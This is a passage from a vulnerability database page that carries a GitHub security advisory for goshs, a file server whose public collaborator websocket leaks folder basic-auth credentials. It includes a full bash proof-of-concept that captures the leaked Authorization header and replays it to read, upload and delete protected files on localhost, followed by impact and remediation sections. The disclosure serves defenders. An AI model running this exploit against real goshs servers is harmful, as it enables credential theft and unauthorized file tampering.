2:\n\nhttps://github.com/user-attachments/assets/b25648a9-b96c-46b3-9ee4-0ae4cc1c3472\n\n\n\n`gosh_poc4` script content:\n\n```bash\n#!/usr/bin/env bash\nset -euo pipefail\n\nREPO=\u0027/Users/r1zzg0d/Documents/CVE hunting/targets/goshs_beta5\u0027\nFIXTURE=\u0027/Users/r1zzg0d/Documents/CVE hunting/targets/goshs_beta5/integration/keepFiles/goshsACLAuth\u0027\nBIN=\u0027/tmp/goshs_beta5_collab_leak\u0027\nPORT=\u002718096\u0027\nWORKDIR=\"$(mktemp -d /tmp/goshs-collab-beta5-XXXXXX)\"\nROOT=\"$WORKDIR/root\"\nWS_LOG=\"$WORKDIR/ws.log\"\nGOSHS_PID=\"\"\nWATCH_PID=\"\"\n\ncleanup() {\n  if [[ -n \"${WATCH_PID:-}\" ]]; then\n    kill \"${WATCH_PID}\" \u003e/dev/null 2\u003e\u00261 || true\n    wait \"${WATCH_PID}\" 2\u003e/dev/null || true\n  fi\n  if [[ -n \"${GOSHS_PID:-}\" ]]; then\n    kill \"${GOSHS_PID}\" \u003e/dev/null 2\u003e\u00261 || true\n    wait \"${GOSHS_PID}\" 2\u003e/dev/null || true\n  fi\n}\ntrap cleanup EXIT\n\nmkdir -p \"${ROOT}/ACLAuth\"\ncp \"${FIXTURE}\" \"${ROOT}/ACLAuth/.goshs\"\nprintf \u0027very secret\\n\u0027 \u003e \"${ROOT}/ACLAuth/secret.txt\"\n\necho \"[1/6] Building goshs beta.5\"\n(cd \"${REPO}\" \u0026\u0026 go build -o \"${BIN}\" ./)\n\necho \"[2/6] Starting goshs without global auth on 127.0.0.1:${PORT}\"\n\"${BIN}\" -d \"${ROOT}\" -p \"${PORT}\" \u003e\"${WORKDIR}/goshs.log\" 2\u003e\u00261 \u0026\nGOSHS_PID=$!\n\nfor _ in $(seq 1 40); do\n  if curl -s \"http://127.0.0.1:${PORT}/\" \u003e/dev/null 2\u003e\u00261; then\n    break\n  fi\n  sleep 0.25\ndone\n\necho \"[3/6] Opening an unauthenticated websocket observer\"\nnode - \u003c\u003c\u0027NODE\u0027 \u003e\"${WS_LOG}\" \u0026\nconst ws = new WebSocket(\u0027ws://127.0.0.1:18096/?ws\u0027);\nws.onopen = () =\u003e console.log(\u0027OPEN\u0027);\nws.onmessage = (ev) =\u003e {\n  const msg = ev.data.toString();\n  console.log(msg);\n  if (msg.includes(\u0027Authorization\u0027)) process.exit(0);\n};\nsetTimeout(() =\u003e process.exit(0), 10000);\nNODE\nWATCH_PID=$!\n\necho \"[4/6] Simulating a victim request with folder credentials\"\ncurl -s -u admin:admin \"http://127.0.0.1:${PORT}/ACLAuth/secret.txt\" \u003e/dev/null\nwait \"${WATCH_PID}\" || true\nWATCH_PID=\"\"\n\nLEAKED_HEADER=\"$(python3 - \"${WS_LOG}\" \u003c\u003c\u0027PY\u0027\nimport pathlib\nimport re\nimport sys\n\ntext = pathlib.Path(sys.argv[1]).read_text()\nm = re.search(r\u0027Basic [A-Za-z0-9+/=]+\u0027, text)\nprint(m.group(0) if m else \u0027\u0027)\nPY\n)\"\n\nif [[ -z \"${LEAKED_HEADER}\" ]]; then\n  echo \"[ERROR] No leaked Authorization header was captured.\" \u003e\u00262\n  echo \"[DEBUG] Websocket output:\" \u003e\u00262\n  cat \"${WS_LOG}\" \u003e\u00262\n  exit 1\nfi\n\necho \"[5/6] Replaying the leaked header as the attacker\"\nUNAUTH_CODE=\"$(curl -s -o /dev/null -w \u0027%{http_code}\u0027 \"http://127.0.0.1:${PORT}/ACLAuth/secret.txt\")\"\nREAD_BACK=\"$(curl -s -H \"Authorization: ${LEAKED_HEADER}\" \"http://127.0.0.1:${PORT}/ACLAuth/secret.txt\")\"\nPUT_CODE=\"$(curl -s -o /dev/null -w \u0027%{http_code}\u0027 -H \"Authorization: ${LEAKED_HEADER}\" -X PUT --data-binary \u0027owned\u0027 \"http://127.0.0.1:${PORT}/ACLAuth/pwn.txt\")\"\nDELETE_CODE=\"$(curl -s -o /dev/null -w \u0027%{http_code}\u0027 -H \"Authorization: ${LEAKED_HEADER}\" \"http://127.0.0.1:${PORT}/ACLAuth/secret.txt?delete\")\"\n\nif [[ \"${UNAUTH_CODE}\" != \"401\" ]]; then\n  echo \"[ERROR] Expected anonymous direct access to fail with 401, got ${UNAUTH_CODE}.\" \u003e\u00262\n  exit 1\nfi\n\nif [[ \"${READ_BACK}\" != \"very secret\" ]]; then\n  echo \"[ERROR] Replayed header did not unlock the protected file.\" \u003e\u00262\n  exit 1\nfi\n\nif [[ \"${PUT_CODE}\" != \"200\" ]]; then\n  echo \"[ERROR] Expected replayed-header PUT to return 200, got ${PUT_CODE}.\" \u003e\u00262\n  exit 1\nfi\n\nif [[ \"${DELETE_CODE}\" != \"200\" ]]; then\n  echo \"[ERROR] Expected replayed-header delete to return 200, got ${DELETE_CODE}.\" \u003e\u00262\n  exit 1\nfi\n\nif [[ ! -f \"${ROOT}/ACLAuth/pwn.txt\" ]]; then\n  echo \"[ERROR] PUT did not create pwn.txt.\" \u003e\u00262\n  exit 1\nfi\n\nif [[ -f \"${ROOT}/ACLAuth/secret.txt\" ]]; then\n  echo \"[ERROR] Delete did not remove secret.txt.\" \u003e\u00262\n  exit 1\nfi\n\necho \"[6/6] Results\"\necho \"Captured header: ${LEAKED_HEADER}\"\necho \"Anonymous GET status: ${UNAUTH_CODE}\"\necho \"Replayed-header GET body: ${READ_BACK}\"\necho \"Replayed-header PUT status: ${PUT_CODE}\"\necho \"Replayed-header delete status: ${DELETE_CODE}\"\necho \"[RESULT] VULNERABLE: public collaborator feed leaked ACL credentials that unlocked the protected subtree\"\n```\n\n### Impact\nThis issue is a sensitive information disclosure that becomes an authentication bypass against `.goshs`-protected content. Any unauthenticated observer who can access the public collaborator websocket can steal folder-level basic-auth credentials from a victim request and immediately reuse them to read, upload, overwrite, or delete files inside the protected subtree. Deployments that rely on public goshs access with selective `.goshs`-protected subfolders are directly exposed.\n\n### Remediation\nSuggested fixes:\n\n1. Never store or broadcast sensitive headers such as `Authorization`, `Cookie`, or `Proxy-Authorization` in collaborator events.\n2. Move collaborator logging until after access-control checks, and log only minimal metadata instead of raw headers and bodies.\n3. Protect the collaborator websocket and panel with the same or stronger authentication boundary as the resources being observed.",
  "id": "GHSA-7h3j-592v-jcrp",
  "modified": "2026-04-15T21:18:16Z",
  "published": "2026-04-14T22:28:54Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/patrickhener/goshs/security/advisories/GHSA-7h3j-592v-jcrp"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/patrickhener/goshs"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "goshs\u0027s public collaborator feed leaks .goshs ACL credentials and enables unauthorized access"
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-40885 (GCVE-0-2026-40885)

FKIE_CVE-2026-40885

GHSA-7H3J-592V-JCRP

Summary

Details

PoC

Impact

Remediation

Tags

Sightings

Nomenclature